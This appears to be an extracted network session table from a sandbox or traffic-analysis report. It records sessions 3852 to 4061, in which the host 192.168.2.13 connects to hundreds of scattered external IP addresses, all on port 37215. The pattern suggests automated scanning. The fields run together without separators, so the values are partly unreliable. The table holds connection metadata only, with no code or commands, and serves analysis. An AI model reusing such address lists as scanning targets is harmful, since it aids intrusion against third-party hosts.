                                                  3852192.168.2.1337902197.241.101.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3853192.168.2.1335722197.123.212.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3854192.168.2.1338636197.126.251.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3855192.168.2.1340698197.27.13.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3856192.168.2.1359710197.71.3.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3857192.168.2.135190868.149.129.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3858192.168.2.1343022197.10.168.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3859192.168.2.135407641.11.90.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3860192.168.2.1338916197.61.164.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3861192.168.2.133333641.210.106.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3862192.168.2.1335836223.163.150.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3863192.168.2.1344512197.40.251.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3864192.168.2.1348786152.225.168.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3865192.168.2.1353840197.65.87.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3866192.168.2.1357842157.56.16.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3867192.168.2.135330641.189.64.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3868192.168.2.135097441.153.37.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3869192.168.2.1347644163.205.132.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3870192.168.2.133760241.64.17.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3871192.168.2.135389047.255.173.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3872192.168.2.1347996157.180.152.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3873192.168.2.1333186197.96.42.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3874192.168.2.1358880157.147.63.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3875192.168.2.134565849.140.20.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3876192.168.2.1347180157.122.233.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3877192.168.2.1337002157.48.177.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3878192.168.2.135378641.102.205.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3879192.168.2.1350184157.108.145.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3880192.168.2.1340812197.170.43.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3881192.168.2.1332774174.205.121.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3882192.168.2.1352280197.159.189.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3883192.168.2.133317051.161.113.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3884192.168.2.1337200197.74.237.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3885192.168.2.134167441.101.22.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3886192.168.2.1347186157.110.224.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3887192.168.2.1337120157.85.216.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3888192.168.2.1343598157.198.176.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3889192.168.2.1350784134.42.142.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3890192.168.2.1334370157.86.123.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3891192.168.2.135357080.64.222.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3892192.168.2.134536441.99.180.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3893192.168.2.134168041.246.159.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3894192.168.2.134979241.81.42.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3895192.168.2.1352764157.192.56.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3896192.168.2.135380041.135.122.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3897192.168.2.133421680.17.155.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3898192.168.2.1335372157.25.119.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3899192.168.2.13500389.177.141.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3900192.168.2.133508241.194.188.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3901192.168.2.1338552221.177.146.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3902192.168.2.1335660183.251.90.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3903192.168.2.1348500197.69.94.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3904192.168.2.1345048197.201.65.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3905192.168.2.134604041.4.35.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3906192.168.2.1341432157.92.226.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3907192.168.2.1350448157.232.28.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3908192.168.2.135008441.12.182.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3909192.168.2.135619881.126.243.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3910192.168.2.135240441.32.141.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3911192.168.2.133327041.45.46.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3912192.168.2.1356060157.171.210.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3913192.168.2.1344008197.117.240.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3914192.168.2.1355636157.164.55.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3915192.168.2.135657091.98.58.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3916192.168.2.1357004197.73.199.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3917192.168.2.134877650.63.98.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3918192.168.2.1359524157.46.252.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3919192.168.2.134439449.32.91.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3920192.168.2.1344392197.89.200.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3921192.168.2.1341904197.130.146.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3922192.168.2.1360964157.0.242.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3923192.168.2.1337798197.19.145.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3924192.168.2.1359776163.71.181.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3925192.168.2.1339062197.33.189.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3926192.168.2.1351664197.92.112.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3927192.168.2.1356468197.190.176.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3928192.168.2.1334774157.140.126.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3929192.168.2.1344136198.203.178.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3930192.168.2.134091260.246.81.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3931192.168.2.1340452157.15.86.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3932192.168.2.1348566197.1.249.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3933192.168.2.134261662.186.87.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3934192.168.2.1341840174.84.233.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3935192.168.2.1335748157.239.26.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3936192.168.2.135269864.220.82.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3937192.168.2.1351538157.123.103.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3938192.168.2.1341016196.73.240.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3939192.168.2.1353918157.45.228.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3940192.168.2.133356041.89.57.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3941192.168.2.1334848157.74.161.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3942192.168.2.134933041.52.254.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3943192.168.2.1351756197.125.165.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3944192.168.2.134966241.162.170.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3945192.168.2.133686841.218.230.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3946192.168.2.1359132197.237.222.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3947192.168.2.135911441.40.208.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3948192.168.2.1348994197.70.246.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3949192.168.2.133327841.69.73.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3950192.168.2.1358428197.201.67.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3951192.168.2.133508241.191.64.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3952192.168.2.1356960106.189.174.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3953192.168.2.133475641.49.185.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3954192.168.2.1335290204.231.150.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3955192.168.2.1350492123.202.178.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3956192.168.2.1356112157.131.230.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3957192.168.2.134495064.189.247.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3958192.168.2.133911641.90.182.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3959192.168.2.1356416197.234.191.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3960192.168.2.1347262157.216.172.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3961192.168.2.1351062142.119.103.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3962192.168.2.1358278197.240.150.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3963192.168.2.135601441.172.113.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3964192.168.2.135006841.170.115.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3965192.168.2.133318841.118.213.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3966192.168.2.1332984157.193.181.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3967192.168.2.135084241.70.28.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3968192.168.2.1358252157.200.188.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3969192.168.2.134274898.86.183.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3970192.168.2.133742685.41.243.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3971192.168.2.134734241.82.224.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3972192.168.2.1339998197.240.21.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3973192.168.2.1353662101.241.126.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3974192.168.2.13385149.224.251.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3975192.168.2.1360912132.201.49.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3976192.168.2.1341424157.222.147.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3977192.168.2.1344802157.41.57.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3978192.168.2.1340130197.44.193.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3979192.168.2.1336988143.30.130.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3980192.168.2.1343190197.140.154.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3981192.168.2.1354538157.160.219.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3982192.168.2.1340558197.232.152.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3983192.168.2.1347600155.223.221.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3984192.168.2.1348638157.44.126.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3985192.168.2.1345044118.128.144.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3986192.168.2.1339000157.170.75.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3987192.168.2.1351454197.203.79.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3988192.168.2.133437641.136.225.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3989192.168.2.1342110220.153.220.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3990192.168.2.1340070197.190.59.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3991192.168.2.133935241.122.67.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3992192.168.2.135345441.77.153.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3993192.168.2.1358518197.237.191.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3994192.168.2.135352434.158.150.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3995192.168.2.1349576121.192.214.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3996192.168.2.1344326157.50.51.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3997192.168.2.1353766157.140.118.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3998192.168.2.1360490197.209.40.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3999192.168.2.1349340157.63.17.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4000192.168.2.1335226172.37.99.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4001192.168.2.1337924197.44.135.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4002192.168.2.1338848197.248.117.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4003192.168.2.1337396197.184.155.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4004192.168.2.1346810157.219.128.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4005192.168.2.133616841.246.104.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4006192.168.2.135714041.101.238.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4007192.168.2.1345650166.84.0.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4008192.168.2.1338882197.59.178.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4009192.168.2.133342041.93.216.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4010192.168.2.1359922157.188.225.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4011192.168.2.1351896197.52.15.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4012192.168.2.1360160157.12.51.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4013192.168.2.1354912197.29.181.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4014192.168.2.1333426157.20.215.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4015192.168.2.1337028197.254.245.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4016192.168.2.134335841.193.136.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4017192.168.2.134720441.184.124.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4018192.168.2.1333988197.246.220.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4019192.168.2.1360724157.9.103.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4020192.168.2.1348738197.239.130.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4021192.168.2.135985887.54.47.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4022192.168.2.1351178157.85.50.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4023192.168.2.1360550197.194.155.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4024192.168.2.1358026197.244.152.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4025192.168.2.1354008157.73.113.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4026192.168.2.1337018197.89.68.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4027192.168.2.1347324197.59.135.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4028192.168.2.13545561.77.243.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4029192.168.2.133675298.19.174.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4030192.168.2.1339494157.6.39.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4031192.168.2.1342938197.79.222.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4032192.168.2.134842041.44.202.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4033192.168.2.1357768157.45.206.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4034192.168.2.1357230144.92.213.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4035192.168.2.133762666.153.64.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4036192.168.2.1358024197.250.147.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4037192.168.2.1356176209.26.70.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4038192.168.2.1340936197.219.152.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4039192.168.2.1355936157.181.84.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4040192.168.2.134926441.168.51.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4041192.168.2.1354402157.154.148.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4042192.168.2.1344616197.149.170.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4043192.168.2.133945241.203.35.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4044192.168.2.1342376157.63.124.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4045192.168.2.1358542197.187.32.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4046192.168.2.134859041.106.78.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4047192.168.2.133485059.229.176.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4048192.168.2.13427404.79.184.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4049192.168.2.1354380157.101.63.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4050192.168.2.135212041.30.225.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4051192.168.2.134991841.214.237.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4052192.168.2.1359008197.12.143.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4053192.168.2.1335278197.220.5.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4054192.168.2.134214441.153.181.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4055192.168.2.134025641.195.37.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4056192.168.2.1345556197.50.247.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4057192.168.2.13459702.233.147.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4058192.168.2.135453888.179.169.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4059192.168.2.1353876157.114.31.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4060192.168.2.1342472177.208.210.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4061192.168.2.134374841.240.56.14337215
